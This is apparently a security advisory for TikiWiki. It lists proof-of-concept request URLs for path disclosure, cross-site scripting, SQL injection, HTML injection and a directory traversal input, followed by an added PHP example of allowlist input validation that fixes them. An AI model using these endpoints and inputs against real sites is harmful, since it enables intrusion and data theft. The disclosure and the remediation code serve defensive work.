TikiWiki Project Multiple Input Validation Vulnerabilities
The following proof of concept examples have been provided:

Path disclosure:
  tiki-searchindex.php?highlight=[JNK]
  messu-read.php?offset=[INT]&flag=&priority=&flagval=&sort_mode=
  messu-read.php?offset=[INT]&flag=&priority=&flagval=
  messu-read.php?offset=[INT]&flag=&priority=
  messu-read.php?offset=[INT]&flag=
  messu-read.php?offset=
  tiki-list_file_gallery.php?find=&galleryId=1&offset=[INT]&sort_mode=
  tiki-usermenu.php?find=&offset=
  tiki-usermenu.php?find=&offset=[INT]&sort_mode=
  tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=[INT]&sort_mode=
  tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=
  tiki-index.php?page=[VPG]&comments_threshold=[INT]&comments_offset=[INT]&comments_maxComments=
  tiki-user_tasks.php?task_useDates=&taskId=[VID]&offset=[INT]&sort_mode=priority_desc&find=[JNK]
  tiki-user_tasks.php?task_useDates=&taskId=[VID]&offset=[INT]&sort_mode=
  tiki-directory_ranking.php?sort_mode=
  tiki-file_galleries.php?find=&search=find&sort_mode=
  tiki-list_faqs.php?find=&offset=[INT]&sort_mode=
  tiki-list_faqs.php?find=&offset=
  tiki-list_trackers.php?find=&offset=[INT]&sort_mode=
  tiki-list_trackers.php?find=&offset=

Cross-site scripting:
  tiki-switch_theme.php?theme=[XSS]
  messu-mailbox.php?flags=&priority=&find=[XSS]
  messu-mailbox.php?flags=&priority=[XSS]
  messu-read.php?offset=[INT]&flag=&priority=&flagval=&sort_mode=date_desc&find=[XSS]
  messu-read.php?offset=[INT]&flag=&priority=&flagval=&sort_mode=[XSS]
  messu-read.php?offset=[INT]&flag=&priority=&flagval=[XSS]
  messu-read.php?offset=[INT]&flag=&priority=[XSS]
  messu-read.php?offset=[INT]&flag=[XSS]
  messu-read.php?offset=[XSS]
  tiki-read_article.php?articleId=[VID][XSS]
  tiki-browse_categories.php?find=&deep=off&parentId=[VID][XSS]
  tiki-index.php?page=[VPG]&comments_threshold=[INT][XSS]
  tiki-print_article.php?articleId=[VID][XSS]
  tiki-list_file_gallery.php?galleryId=[VID][XSS]
  tiki-upload_file.php?galleryId=[VID][XSS]
  tiki-view_faq.php?faqId=[VID][XSS]
  tiki-view_chart.php?chartId=[VID][XSS]
  tiki-survey_stats_survey.php?surveyId=[VID][XSS]

SQL injection:
  tiki-usermenu.php?find=&offset=[INT]&sort_mode=[SQL]
  tiki-list_file_gallery.php?find=&galleryId=[VID]&offset=[INT]&sort_mode=[SQL]
  tiki-directory_ranking.php?sort_mode=[SQL]
  tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=[INT]&sort_mode=[SQL]
  tiki-index.php?page=[VPG]&comments_threshold=[INT]&comments_offset=[INT]&comments_sort_mode=[SQL]
  tiki-user_tasks.php?task_useDates=&taskId=[VID]&offset=[INT]&sort_mode=[SQL]
  tiki-directory_search.php?how=or&words=&where=all&sort_mode=[SQL]
  tiki-file_galleries.php?find=&search=find&sort_mode=[SQL]
  tiki-list_faqs.php?find=&offset=[INT]&sort_mode=[SQL]
  tiki-list_trackers.php?find=&offset=[INT]&sort_mode=[SQL]
  tiki-list_blogs.php?find=&offset=[INT]&sort_mode=[SQL]
  tiki-usermenu.php?find=&offset=[SQL]
  tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=[SQL]
  tiki-index.php?page=[VPG]&comments_threshold=[INT]&comments_offset=[SQL]
  tiki-user_tasks.php?task_useDates=&taskId=[VID]&offset=[SQL]
  tiki-list_faqs.php?find=&offset=[SQL]
  tiki-list_trackers.php?find=&offset=[SQL]
  tiki-list_blogs.php?find=&offset=[SQL]

HTML injection:
  User Profile > Theme
  User Profile > Country Field
  User Profile > Real Name
  User Profile > Displayed time zone
  Directory > Add Site > Name
  Directory > Add Site > Description
  Directory > Add Site > URL
  Directory > Add Site > Country

Directory traversal:
  /tiki-map.phtml?mapfile=../../../../var/

Remote file upload:
  http://www.example.com/img/wiki_up/filenamehere
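Nearly every entry above reaches the same three parameters (sort_mode, offset and an id such as galleryId or faqId) that the listing scripts pass unchecked into ORDER BY, LIMIT and error output. The following is an added example, not TikiWiki's own code, of the allowlist validation that closes all three classes at once; the table and column names are assumed for illustration.

```php
<?php
// Added example (not TikiWiki code): allowlist validation for the parameters
// named in the advisory. Table and column names below are assumed.

/**
 * Accept only "<column>_<asc|desc>" where <column> is in the allowlist,
 * so sort_mode can never carry SQL into ORDER BY or junk into an error page.
 */
function validate_sort_mode(?string $raw, array $allowedColumns, string $default): string
{
    if ($raw === null || $raw === '') {
        return $default;
    }
    if (!preg_match('/^([a-z][a-z0-9]*)_(asc|desc)$/', $raw, $m)) {
        return $default;
    }
    return in_array($m[1], $allowedColumns, true) ? $raw : $default;
}

/** Coerce offset to a non-negative integer; "[XSS]", "[SQL]" and junk become 0. */
function validate_offset($raw): int
{
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $v === false ? 0 : $v;
}

/** Coerce an id parameter (galleryId, faqId, ...) to a positive int or null. */
function validate_id($raw): ?int
{
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

// Usage as a listing script such as tiki-list_faqs.php would apply it.
$sortMode = validate_sort_mode($_GET['sort_mode'] ?? null, ['title', 'created', 'hits'], 'created_desc');
$offset   = validate_offset($_GET['offset'] ?? 0);
$find     = (string) ($_GET['find'] ?? '');

// ORDER BY is built only from the validated token; free text goes through bound parameters.
[$col, $dir] = explode('_', $sortMode);
$sql = "SELECT faqId, title FROM tiki_faqs WHERE title LIKE ? ORDER BY `$col` "
     . strtoupper($dir) . ' LIMIT ?, ?';
// $stmt = $pdo->prepare($sql);
// $stmt->bindValue(1, "%$find%");
// $stmt->bindValue(2, $offset, PDO::PARAM_INT);  // integers, not quoted strings, for LIMIT
// $stmt->bindValue(3, 20, PDO::PARAM_INT);

// Reflected values are escaped on output so an [XSS] payload renders as text.
echo 'Results for ' . htmlspecialchars($find, ENT_QUOTES, 'UTF-8');
```

Because every rejected value collapses to a fixed default, the database never sees a malformed query and so never emits the path-revealing error that the "Path disclosure" entries rely on.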